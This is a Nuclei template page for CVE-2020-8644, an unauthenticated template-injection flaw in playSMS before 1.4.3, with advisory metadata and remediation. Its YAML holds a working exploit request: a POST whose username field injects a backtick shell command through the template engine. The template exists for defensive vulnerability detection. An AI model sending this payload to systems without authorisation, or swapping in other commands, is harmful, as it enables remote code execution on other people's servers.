Skip to content
Nuclei Templates

playSMS <1.4.3 - Remote Code Execution

ID: CVE-2020-8644

Severity: critical

Author: dbrwsky

Tags: cve,cve2020,unauth,kev,packetstorm,ssti,playsms,rce

Description

Section titled “Description”

PlaySMS before version 1.4.3 is susceptible to remote code execution because it double processes a server-side template.

YAML Source

Section titled “YAML Source”
id: CVE-2020-8644


info:
  name: playSMS <1.4.3 - Remote Code Execution
  author: dbrwsky
  severity: critical
  description: PlaySMS before version 1.4.3 is susceptible to remote code execution because it double processes a server-side template.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.
  remediation: |
    Upgrade playSMS to version 1.4.4 or later to mitigate this vulnerability.
  reference:
    - https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/
    - https://playsms.org/2020/02/05/playsms-1-4-3-has-been-released/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-8644
    - http://packetstormsecurity.com/files/157106/PlaySMS-index.php-Unauthenticated-Template-Injection-Code-Execution.html
    - https://forum.playsms.org/t/playsms-1-4-3-has-been-released/2704
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-8644
    cwe-id: CWE-94
    epss-score: 0.95356
    epss-percentile: 0.99358
    cpe: cpe:2.3:a:playsms:playsms:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: playsms
    product: playsms
  tags: cve,cve2020,unauth,kev,packetstorm,ssti,playsms,rce


http:
  - raw:
      - |
        GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
      - |
        POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded


        X-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password=


    host-redirects: true
    max-redirects: 2


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '4468-0202-EVC'


      - type: status
        status:
          - 200


    extractors:
      - type: xpath
        name: csrf
        internal: true
        xpath:
          - /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input
        attribute: value
        part: body
# digest: 4b0a00483046022100e43bd2b4ca492733cadef25592ed8bc0d0c48082abe0aeea80457f679b2534a302210098c18867926af3c61e4de801e8f69f683e379fd776f23aac58e1c9dbd33bddd7:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-8644.yaml"

View on Github